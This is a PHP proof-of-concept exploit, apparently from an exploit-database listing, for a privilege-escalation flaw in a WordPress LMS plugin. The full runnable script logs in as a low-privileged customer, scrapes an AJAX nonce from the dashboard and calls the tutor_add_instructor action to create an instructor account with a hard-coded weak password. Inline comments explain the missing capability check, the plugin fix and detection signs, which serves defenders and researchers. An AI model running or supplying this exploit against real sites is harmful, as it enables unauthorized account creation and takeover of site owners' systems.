## https://sploitus.com/exploit?id=WPEX-ID:5E85917C-7A58-49CB-B8B3-05AA18FFFF3E
Only one PoC is provided, covering the privilege escalation.

<?php

// Proof-of-concept for the privilege-escalation issue referenced in the heading
// above (WPEX-ID:5E85917C-7A58-49CB-B8B3-05AA18FFFF3E). Starting from a
// low-privileged ("customer") account it issues three HTTP requests via curl:
//   1) authenticates through wp-login.php and stores the session cookies,
//   2) loads wp-admin/index.php and scrapes a `_wpnonce` value out of the
//      inline `tutor_data` JavaScript object,
//   3) POSTs `action=tutor_add_instructor` to admin-ajax.php with that nonce.
// Defender's reading: the nonce is readable by any logged-in user who can load
// the dashboard, so it only proves the request came from a page that user
// rendered (CSRF protection) — it is not an authorization check. The AJAX
// handler presumably relies on the nonce alone instead of also performing a
// capability check (current_user_can() or equivalent); that is the fix on the
// plugin side. Detection: POSTs to /wp-admin/admin-ajax.php carrying
// action=tutor_add_instructor from non-administrator sessions, and instructor
// accounts appearing outside the normal admin workflow.

// Settings — all three values are taken straight from argv; there is no
// argument count check or usage message.
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

// 1) Log in as customer
// Session cookies are written to and read back from a temp file so they carry
// over to the later requests. The file is never unlinked, so a valid session
// cookie remains on disk after the script exits.
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
// Standard wp-login.php form fields; 'rememberme' requests a long-lived cookie.
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
// The login response body is stored but never inspected; a successful login
// is simply assumed for the following steps.
$output = curl_exec($ch);
curl_close($ch);

// Pull the Nonce
// The dashboard page embeds `var tutor_data = {...}`, which contains the nonce
// the plugin's own front-end AJAX calls use. Any authenticated user able to
// reach wp-admin/index.php can read it from the HTML.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/index.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

// The pattern is pinned to the exact English `delete_confirm_text` string, so
// a differently-localised or differently-versioned page yields no match; in
// that case $matches is empty and $matches[1] below is an undefined index.
preg_match('/var\stutor_data\s=\s{"delete_confirm_text"\:"Are you sure\?\sit\scan\snot\sbe\sundone\."\,"nonce_key"\:"_wpnonce","_wpnonce":"([^"]+)"/', $content, $matches);
$nonce = $matches[1];
print_r($nonce);

// Update Settings
// (The heading is misleading: judging by the field names and the
// `tutor_add_instructor` action, this request appears to create a new
// instructor-level account, not change settings.) All account details are
// hard-coded, including a trivially weak password; the scraped nonce is the
// only token accompanying the request.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'first_name' => 'Instructor',
    'last_name' => 'Instructor',
    'user_login' => 'Instructor',
    'email' => 'Instructor@Instructor.com',
    'phone_number' => '1234567890',
    'password' => 'test',
    'password_confirmation' => 'test',
    'tutor_profile_bio' => '',
    'action' => 'tutor_add_instructor',
    '_wpnonce' => $nonce
]);

// The handler's raw response body is printed verbatim; no success/failure
// interpretation is done here.
$output = curl_exec($ch);
curl_close($ch);
print_r($output);